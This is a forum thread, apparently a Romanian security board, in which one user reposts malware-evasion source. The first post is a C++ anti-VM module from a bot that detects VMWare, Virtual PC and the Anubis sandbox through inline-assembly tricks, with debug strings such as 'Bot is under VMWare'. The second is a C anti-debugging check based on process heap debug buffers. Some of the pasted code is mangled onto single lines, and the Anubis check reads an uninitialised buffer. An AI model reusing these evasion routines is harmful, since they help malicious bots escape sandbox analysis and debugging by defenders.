Nytro Posted January 23, 2012 Report Posted January 23, 2012 [h=1][C++] Anti-VMWare[/h]Author: _Carb0n_#include "../Headers/includes.h"#include "../Headers/functions.h"#ifndef NO_ANTIVMDWORD __forceinline IsInsideVPC_exceptionFilter(LPEXCEPTION_POINTERS ep){ PCONTEXT ctx = ep->ContextRecord; ctx->Ebx = -1; // Not running VPC ctx->Eip += 4; // skip past the "call VPC" opcodes return EXCEPTION_CONTINUE_EXECUTION;}bool DetectVPC(){ bool bVPCIsPresent = FALSE; __try { _asm push ebx _asm mov ebx, 0 // It will stay ZERO if VPC is running _asm mov eax, 1 // VPC function number _asm __emit 0Fh _asm __emit 3Fh _asm __emit 07h _asm __emit 0Bh _asm test ebx, ebx _asm setz [bVPCIsPresent] _asm pop ebx } __except(IsInsideVPC_exceptionFilter(GetExceptionInformation())) { } #ifdef DEBUG if (bVPCIsPresent==TRUE) DebugMsg("Bot is under VPC !"); else DebugMsg("Bot is not running under VPC !"); #endif return bVPCIsPresent;}bool DetectVMWare(){ bool bVMWareIsPresent = TRUE; __try { __asm { push edx push ecx push ebx mov eax, 'VMXh' mov ebx, 0 // any value but not the MAGIC VALUE mov ecx, 10 // get VMWare version mov edx, 'VX' // port number in eax, dx // read port // on return EAX returns the VERSION cmp ebx, 'VMXh' // is it a reply from VMWare? setz [bVMWareIsPresent] // set return value pop ebx pop ecx pop edx } } __except(EXCEPTION_EXECUTE_HANDLER) { bVMWareIsPresent = FALSE; } #ifdef DEBUG if (bVMWareIsPresent==TRUE) DebugMsg("Bot is under VMWare !"); else DebugMsg("Bot is not running under VMWare !"); #endif return bVMWareIsPresent;}bool DetectAnubis(){ char szBotFile[MAX_PATH]; bool bAnubisIsPresent = FALSE; if (strstr(szBotFile, "C:InsideTm")) bAnubisIsPresent = TRUE; #ifdef DEBUG if (bAnubisIsPresent==TRUE) DebugMsg("Bot is running under Anubis !"); else DebugMsg("Bot is not running under Anubis !"); #endif return bAnubisIsPresent;}bool IsProcessRunningUnderVM(){ bool bVMWare; bool bVPC; bool bAnubis; bVMWare = DetectVMWare(); bVPC = DetectVPC(); bAnubis = DetectAnubis(); if (bVPC==TRUE || bVMWare==TRUE || bAnubis==TRUE) return TRUE; return FALSE;}#endifSursa: http://www.hackhound.org/forum/topic/893-c-anti-vmware/ Quote
Nytro Posted January 23, 2012 Author Report Posted January 23, 2012 Tot pe aceasta ramura:[h=2]Anti-Debug trick[/h]defs.hNtCreateEventPair(OUT PHANDLEIN ACCESS_MASKIN POBJECT_ATTRIBUTESEventPairHandle,DesiredAccess,ObjectAttributes OPTIONAL );typedef struct _DEBUG_EVENT{LIST_ENTRY EventList;KEVENT ContinueEvent;CLIENT_ID ClientId;PEPROCESS Process;PETHREAD Thread;NTSTATUS Status;ULONG Flags;PETHREAD BackoutThread;DBGKM_MSG ApiMsg;} DEBUG_EVENT, *PDEBUG_EVENT;typedef struct _DBGKM_MSG{PORT_MESSAGE h;DBGKM_APINUMBER ApiNumber;ULONG ReturnedStatus;union{DBGKM_EXCEPTION Exception;DBGKM_CREATE_THREAD CreateThread;DBGKM_CREATE_PROCESS CreateProcess;DBGKM_EXIT_THREAD ExitThread;DBGKM_EXIT_PROCESS ExitProcess;DBGKM_LOAD_DLL LoadDll;DBGKM_UNLOAD_DLL UnloadDll;};} DBGKM_MSG, *PDBGKM_MSG;detect.c#define WIN32_LEAN_AND_MEAN#include <stdio.h>#include <stdlib.h>#include <windows.h>#include "defs.h"#pragma comment(lib,"ntdll.lib")#pragma comment(lib,"psapi.lib")void QueryProcessHeapMethod(void){ PDEBUG_BUFFER buffer; buffer = RtlCreateQueryDebugBuffer(0,FALSE); RtlQueryProcessHeapInformation(buffer); if (buffer->RemoteSectionBase == (PVOID) 0x50000062) MessageBoxA(NULL,"Debugged","Warning",MB_OK); else MessageBoxA(NULL,"Not Debugged","Warning",MB_OK); if (buffer->EventPairHandle == (PVOID) 0x00002b98) MessageBoxA(NULL,"Debugged","Warning",MB_OK); else MessageBoxA(NULL,"Not Debugged","Warning",MB_OK); printf("EventPairHandle= %x",(int)buffer->EventPairHandle);}int main(){ QueryProcessHeapMethod();}Sursa (cu alte informatii utile): Anti-Debug trick Quote
